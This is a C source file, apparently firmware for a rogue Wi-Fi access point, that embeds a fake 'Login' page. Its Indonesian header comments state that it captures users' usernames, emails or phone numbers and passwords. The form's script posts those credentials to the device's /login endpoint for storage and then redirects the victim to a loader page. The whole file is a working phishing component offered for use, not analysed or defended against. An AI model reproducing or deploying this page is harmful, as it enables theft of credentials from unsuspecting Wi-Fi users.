// WiFi Clone Login Page - BASIC VERSION
// Menangkap username (email/nomor) dan password dari user
// POST ke /login untuk menyimpan credentials

const char wifi_clone_login_header_html[] =
"<!DOCTYPE html>\n"
"<html>\n"
"<head>\n"
"    <meta charset=\"UTF-8\">\n"
"    <title>Login</title>\n"
"    <style>\n"
"        body {\n"
"            font-family: Arial, sans-serif;\n"
"            margin: 0;\n"
"            padding: 20px;\n"
"            background-color: #f0f0f0;\n"
"        }\n"
"        .container {\n"
"            max-width: 400px;\n"
"            margin: 50px auto;\n"
"            background: white;\n"
"            padding: 20px;\n"
"            border: 1px solid #ccc;\n"
"        }\n"
"        h1 {\n"
"            text-align: center;\n"
"            font-size: 20px;\n"
"        }\n"
"        .form-group {\n"
"            margin-bottom: 15px;\n"
"        }\n"
"        label {\n"
"            display: block;\n"
"            margin-bottom: 5px;\n"
"            font-weight: bold;\n"
"        }\n"
"        input[type=\"text\"],\n"
"        input[type=\"password\"] {\n"
"            width: 100%;\n"
"            padding: 8px;\n"
"            border: 1px solid #ccc;\n"
"        }\n"
"        button {\n"
"            width: 100%;\n"
"            padding: 10px;\n"
"            background-color: #007bff;\n"
"            color: white;\n"
"            border: none;\n"
"            cursor: pointer;\n"
"            margin-top: 10px;\n"
"        }\n"
"        button:hover {\n"
"            background-color: #0056b3;\n"
"        }\n"
"        .error {\n"
"            color: red;\n"
"            text-align: center;\n"
"            margin-bottom: 15px;\n"
"            display: none;\n"
"        }\n"
"    </style>\n"
"</head>\n";

const char wifi_clone_login_body_html[] =
"<body>\n"
"    <div class=\"container\">\n"
"        <h1>Login</h1>\n"
"        <div class=\"error\" id=\"errorMsg\"></div>\n"
"\n"
"        <form id=\"loginForm\" onsubmit=\"handleLogin(event)\">\n"
"            <div class=\"form-group\">\n"
"                <label for=\"username\">Username / Email:</label>\n"
"                <input type=\"text\" id=\"username\" name=\"username\" placeholder=\"username\" required>\n"
"            </div>\n"
"\n"
"            <div class=\"form-group\">\n"
"                <label for=\"password\">Password:</label>\n"
"                <input type=\"password\" id=\"password\" name=\"password\" placeholder=\"password\" required>\n"
"            </div>\n"
"\n"
"            <button type=\"submit\">Login</button>\n"
"        </form>\n"
"    </div>\n"
"\n"
"    <script>\n"
"        function handleLogin(event) {\n"
"            event.preventDefault();\n"
"            const username = document.getElementById('username').value;\n"
"            const password = document.getElementById('password').value;\n"
"            const form = document.getElementById('loginForm');\n"
"            const errorMsg = document.getElementById('errorMsg');\n"
"\n"
"            errorMsg.style.display = 'none';\n"
"            errorMsg.textContent = '';\n"
"\n"
"            if (!username || !password) {\n"
"                errorMsg.textContent = 'Username dan password harus diisi';\n"
"                errorMsg.style.display = 'block';\n"
"                return;\n"
"            }\n"
"\n"
"            const formData = new FormData();\n"
"            formData.append('username', username);\n"
"            formData.append('password', password);\n"
"\n"
"            fetch('/login', {\n"
"                method: 'POST',\n"
"                body: formData\n"
"            })\n"
"            .then(response => response.json())\n"
"            .then(data => {\n"
"                if (data.success) {\n"
"                    setTimeout(() => {\n"
"                        window.location.href = '/loader.html';\n"
"                    }, 500);\n"
"                } else {\n"
"                    errorMsg.textContent = data.message || 'Login gagal';\n"
"                    errorMsg.style.display = 'block';\n"
"                }\n"
"            })\n"
"            .catch(error => {\n"
"                console.error('Error:', error);\n"
"                errorMsg.textContent = 'Terjadi kesalahan';\n"
"                errorMsg.style.display = 'block';\n"
"            });\n"
"        }\n"
"    </script>\n"
"</body>\n"
"</html>\n";
